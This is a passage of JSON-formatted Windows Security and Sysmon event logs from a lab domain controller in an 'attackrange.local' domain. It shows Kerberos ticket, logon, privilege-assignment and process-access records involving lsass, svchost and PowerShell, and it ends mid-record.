{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220327,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220328,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220329,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45B2D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{2EA09B96-FE62-51BC-744A-7524CEC268C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45b2d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{2EA09B96-FE62-51BC-744A-7524CEC268C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220330,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45B2D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45b2d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.843\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.843","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.859\r\nProcessGuid: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nProcessId: 4192\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_20ssn0zr.01g.ps1\r\nCreationUtcTime: 2020-08-01 05:47:09.859","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.859","ProcessGuid":"{A837DB8D-01DD-5F25-0000-0010FB590400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_20ssn0zr.01g.ps1","CreationUtcTime":"2020-08-01 05:47:09.859","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.890\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.890","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.890\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 